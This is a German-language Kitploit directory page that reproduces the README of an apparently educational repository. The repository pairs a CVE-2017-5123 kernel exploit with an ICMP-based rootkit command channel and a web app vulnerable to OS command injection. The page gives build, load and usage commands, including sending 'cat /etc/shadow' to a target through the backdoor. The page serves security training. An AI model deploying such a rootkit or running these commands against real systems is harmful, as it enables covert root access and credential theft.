Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
cve-2017-5123 — Pädagogische Demonstration des CVE-2017-5123-Kernel-Exploits, ICMP-basierter Rootkit-Befehls- und Steuerung, sowie einer für OS-Befehlsinjektion anfälligen Webanwendung für Cybersicherheitstrainings. | Kitploit
Tools/GitHubGitHub/nabilboudra/cve-2017-5123
Privilege EscalationExploitationWebanwendungs-ExploitationCommand and ControlLernen & BildungPayload-EntwicklungBinary-ExploitationLabs & Praxis
GitHubnabilboudra/cve-2017-5123

cve-2017-5123

Pädagogische Demonstration des CVE-2017-5123-Kernel-Exploits, ICMP-basierter Rootkit-Befehls- und Steuerung, sowie einer für OS-Befehlsinjektion anfälligen Webanwendung für Cybersicherheitstrainings.

vor 8 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigen

CVE-2017-5123

Dieses Repository enthält eine Demonstration von CVE-2017-5123, einem ICMP-Backdoor für Command-and-Control, sowie einer CWE-78 (OS Command Injection) verwundbaren Webanwendung.

Teil von CSC 4308 - Challenge 3.

Voraussetzungen

  • Linux-Kernel: 4.13 bis (ausschließlich) 4.13.7
  • Node.js: 10.x
  • npm: 6.x

Überblick

Dieses Projekt demonstriert drei verschiedene sicherheitsrelevante Forschungskomponenten:

1. CVE-2017-5123 Kernel-Exploit (lkm/rootkit.c)

Ein Proof-of-Concept-Exploit für die waitid-Systemaufruf-Schwachstelle, die in Linux-Kernel 4.13 eingeführt wurde. Diese Schwachstelle ermöglicht Privilegieneskalation und Sandbox-Escape.

  • CVE-ID: CVE-2017-5123
  • CWE-ID: CWE-787 (Out-of-bounds Write)
  • Auswirkung: Lokale Privilegieneskalation
  • Exploit-Autor: Chris Salls (@chris_salls)

2. Kernel-Rootkit-LKM (lkm/lkm.c)

Ein bösartiges Linux-Kernel-Modul (LKM), das einen verdeckten Command-and-Control-Kanal über ICMP-Echo-(Ping-)Pakete implementiert.

  • CWE-ID: CWE-912 (Versteckte Funktionalität)
  • Funktionalität:
    • Abfängt ICMP-Echo-Anfragen mit Sequenznummer 25678
    • Extrahiert Shell-Befehle aus ICMP-Nutzdaten
    • Führt Befehle als root aus
    • Gibt Befehlsausgabe über ICMP-Echo-Antwortpakete zurück

3. Verwundbare Webanwendung (vulnerable-app/)

Eine React + Node.js Dateifreigabe-Anwendung, die anfällig für OS-Kommandoinjektion ist.

  • CWE-ID: CWE-78 (OS Command Injection)
  • Schwachstelle: Shell-Metazeichen-Injektion im Datei-Inhaltsfeld

4. ICMP-Daten-Pinger (pinger/data-ping.c)

Ein Dienstprogramm zum Senden maßgeschneiderter ICMP-Echo-Anfragen mit benutzerdefinierten Nutzdaten zur Kommunikation mit dem Kernel-Rootkit-Backdoor.

Verwendung

Laden des LKM

Kernel-Modul bauen

root@kitploit:~
cd lkm
make

Kernel-Modul laden

root@kitploit:~
sudo insmod lkm.ko

Pinger-Client bauen

root@kitploit:~
cd ../pinger
gcc -o data-ping data-ping.c

Befehle über ICMP senden

root@kitploit:~
# Muss als root ausgeführt werden, um Raw-Sockets zu verwenden
sudo ./data-ping <target-ip> "whoami"
sudo ./data-ping localhost "ls -la /root"
sudo ./data-ping 192.168.1.100 "cat /etc/shadow"

Modul entladen

root@kitploit:~
sudo rmmod lkm

Schnelles Neuladen

root@kitploit:~
make reload

Ausführen der verwundbaren Webanwendung

root@kitploit:~
# Frontend bauen
cd vulnerable-app/frontend
npm run build

# Build in Backend kopieren
cp -r build ../backend/

# Backend-Server starten (bedient sowohl API als auch Frontend)
cd ../backend
npm start

Die Anwendung ist verfügbar unter http://localhost:3001

Referenzen

  • CVE-2017-5123: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5123
  • CWE-78: https://cwe.mitre.org/data/definitions/78.html
  • CWE-787: https://cwe.mitre.org/data/definitions/787.html
  • CWE-912: https://cwe.mitre.org/data/definitions/912.html
  • Chris Salls' Original-Exploit-Code: https://github.com/salls/kernel-exploits
Tool herunterladen